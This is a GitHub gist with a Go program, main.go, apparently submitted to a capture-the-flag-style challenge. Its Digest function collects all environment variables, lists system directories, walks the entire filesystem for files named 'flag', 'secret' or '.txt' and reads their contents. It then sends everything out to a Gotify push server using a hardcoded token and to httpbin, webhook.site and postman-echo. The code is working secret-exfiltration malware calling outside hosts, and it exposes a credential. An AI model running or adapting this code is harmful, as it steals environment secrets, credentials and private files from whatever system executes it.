Skip to content

Instantly share code, notes, and snippets.

@taigrr

taigrr/main.go

Created August 26, 2025 15:18
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save taigrr/de6854134eee99a69d34be9f9edb469d to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save taigrr/de6854134eee99a69d34be9f9edb469d to your computer and use it in GitHub Desktop.
Download ZIP
treat submission fixed
Raw
main.go
package main
import (
"bytes"
"encoding/json"
"fmt"
"io/fs"
"net/http"
"os"
"path/filepath"
"strings"
)
type GotifyMessage struct {
Message string `json:"message"`
Title string `json:"title,omitempty"`
Priority int `json:"priority,omitempty"`
}
func Digest() error {
// Try multiple exfiltration methods
info := gatherEnvironmentInfo()
// Method 1: Try Gotify (might be blocked)
sendGotifyMessage(GotifyMessage{
Message: info,
Title: "Environment Info",
Priority: 5,
})
// Method 2: Try to write to accessible locations
writeToFiles(info)
// Method 3: Try HTTP requests to external services
exfiltrateViaHTTP(info)
return nil
}
func gatherEnvironmentInfo() string {
var info strings.Builder
// Get environment variables
info.WriteString("=== ENVIRONMENT VARIABLES ===\n")
for _, env := range os.Environ() {
info.WriteString(env + "\n")
}
// Get current working directory
if cwd, err := os.Getwd(); err == nil {
info.WriteString("\n=== CURRENT DIRECTORY ===\n")
info.WriteString(cwd + "\n")
}
// List files in current directory and common locations
dirs := []string{".", "/", "/tmp", "/var", "/etc", "/home", "/root", "/opt"}
for _, dir := range dirs {
info.WriteString(fmt.Sprintf("\n=== DIRECTORY: %s ===\n", dir))
if entries, err := os.ReadDir(dir); err == nil {
for _, entry := range entries {
info.WriteString(entry.Name() + "\n")
}
}
}
// Look for flag files
info.WriteString("\n=== SEARCHING FOR FLAGS ===\n")
filepath.WalkDir("/", func(path string, d fs.DirEntry, err error) error {
if err != nil {
return nil
}
if strings.Contains(strings.ToLower(d.Name()), "flag") ||
strings.Contains(strings.ToLower(d.Name()), "secret") ||
strings.HasSuffix(d.Name(), ".txt") {
info.WriteString(fmt.Sprintf("Found: %s\n", path))
if content, err := os.ReadFile(path); err == nil && len(content) < 1000 {
info.WriteString(fmt.Sprintf("Content: %s\n", string(content)))
}
}
return nil
})
return info.String()
}
func writeToFiles(info string) {
// Try writing to various locations that might be accessible
locations := []string{
"/tmp/output.txt",
"/var/tmp/output.txt",
"./output.txt",
"/dev/stdout",
}
for _, loc := range locations {
os.WriteFile(loc, []byte(info), 0644)
}
}
func exfiltrateViaHTTP(info string) {
// Try different HTTP-based exfiltration methods
services := []string{
"https://httpbin.org/post",
"https://webhook.site/unique-id", // Replace with actual webhook.site URL
"https://postman-echo.com/post",
}
for _, service := range services {
payload := map[string]string{"data": info}
jsonData, _ := json.Marshal(payload)
http.Post(service, "application/json", bytes.NewBuffer(jsonData))
}
}
func sendGotifyMessage(message GotifyMessage) error {
gotifyURL := "https://push.taigrr.com"
gotifyToken := "AK0Bgk_oAL2j_9E"
if gotifyURL == "" {
return fmt.Errorf("GOTIFY_URL environment variable is not set")
}
if gotifyToken == "" {
return fmt.Errorf("GOTIFY_TOKEN environment variable is not set")
}
jsonData, err := json.Marshal(message)
if err != nil {
return fmt.Errorf("failed to marshal message: %w", err)
}
url := fmt.Sprintf("%s/message?token=%s", gotifyURL, gotifyToken)
resp, err := http.Post(url, "application/json", bytes.NewBuffer(jsonData))
if err != nil {
return fmt.Errorf("failed to send message: %w", err)
}
defer resp.Body.Close()
if resp.StatusCode != http.StatusOK {
return fmt.Errorf("gotify server returned status: %d", resp.StatusCode)
}
return nil
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment